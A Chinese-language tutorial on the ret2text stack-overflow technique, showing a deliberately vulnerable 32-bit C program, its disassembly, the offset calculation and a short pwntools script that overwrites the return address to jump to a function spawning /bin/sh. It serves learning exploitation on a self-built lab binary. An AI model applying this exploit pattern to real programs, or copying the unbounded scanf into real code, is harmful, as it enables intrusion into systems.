ret2text
<p>[TOC]</p>
<h1>🌓攻击分析</h1>
<p>ret2text是ROP系列最简单的攻击方法, 主要是覆盖函数返回地址为程序里某一段可以获取shell的代码
以最简单的例子来讲</p>
<pre><code class="language-c">#include<stdlib.h>
#include<stdio.h>
void hint() {
system("/bin/sh");
}
void input() {
char buf[0x20];
printf("Input: ");
scanf("%s", buf);
}
int main() {
input();
printf("Bye\n");
return 0;
}
// gcc ret2text.c -o ret2text -no-pie -fno-stack-protector -m32</code></pre>
<p><img src="https://pic1.imgdb.cn/item/636fd11616f2c2beb1b57be4.png" alt="" />
编译的程序关闭了canary保护和PIE保护(为了攻击更加简单), 这个程序的漏洞在于input函数里使用了scanf的%s格式化控制符, 该控制符不限制输入字符数, 这就导致我们可以溢出buf数组
input函数的反汇编代码为</p>
<pre><code>08049225 <input>:
8049225: f3 0f 1e fb endbr32
8049229: 55 push ebp
804922a: 89 e5 mov ebp,esp
804922c: 53 push ebx
804922d: 83 ec 24 sub esp,0x24
8049230: e8 fb fe ff ff call 8049130 <__x86.get_pc_thunk.bx>
8049235: 81 c3 cb 2d 00 00 add ebx,0x2dcb
804923b: 83 ec 0c sub esp,0xc
804923e: 8d 83 10 e0 ff ff lea eax,[ebx-0x1ff0]
8049244: 50 push eax
8049245: e8 46 fe ff ff call 8049090 <printf@plt>
804924a: 83 c4 10 add esp,0x10
804924d: 83 ec 08 sub esp,0x8
8049250: 8d 45 d8 lea eax,[ebp-0x28]
8049253: 50 push eax
8049254: 8d 83 18 e0 ff ff lea eax,[ebx-0x1fe8]
804925a: 50 push eax
804925b: e8 70 fe ff ff call 80490d0 <__isoc99_scanf@plt>
8049260: 83 c4 10 add esp,0x10
8049263: 90 nop
8049264: 8b 5d fc mov ebx,DWORD PTR [ebp-0x4]
8049267: c9 leave
8049268: c3 ret</code></pre>
<p><img src="https://pic1.imgdb.cn/item/636fd17016f2c2beb1b62fd6.png" alt="" />
而且程序我们给定了获取shell的函数hint</p>
<pre><code>080491f6 <hint>:
80491f6: f3 0f 1e fb endbr32
80491fa: 55 push ebp
80491fb: 89 e5 mov ebp,esp
80491fd: 53 push ebx
80491fe: 83 ec 04 sub esp,0x4
8049201: e8 a7 00 00 00 call 80492ad <__x86.get_pc_thunk.ax>
8049206: 05 fa 2d 00 00 add eax,0x2dfa
804920b: 83 ec 0c sub esp,0xc
804920e: 8d 90 08 e0 ff ff lea edx,[eax-0x1ff8]
8049214: 52 push edx
8049215: 89 c3 mov ebx,eax
8049217: e8 94 fe ff ff call 80490b0 <system@plt>
804921c: 83 c4 10 add esp,0x10
804921f: 90 nop
8049220: 8b 5d fc mov ebx,DWORD PTR [ebp-0x4]
8049223: c9 leave
8049224: c3 ret</code></pre>
<p>地址为<code>0x80491f6</code>
所以最终的payload可以写为</p>
<pre><code class="language-py">payload = b'a'*0x28 # buf距离ebp的偏移量
payload += b'a'*4 # ebp
payload += p32(0x80491f6) # 覆盖函数返回地址为hint函数地址</code></pre>
<p><img src="https://pic1.imgdb.cn/item/636fd1e016f2c2beb1b731c2.png" alt="" /></p>
<h2>🌙Exploit</h2>
<pre><code class="language-py">from pwn import*
o = process('./ret2text')
payload = b'a'*0x28
payload += b'a'*4
payload += p32(0x80491f6)
o.sendline(payload)
o.interactive()</code></pre>
<p><img src="https://pic1.imgdb.cn/item/636fd25216f2c2beb1b7fd4a.png" alt="" /></p>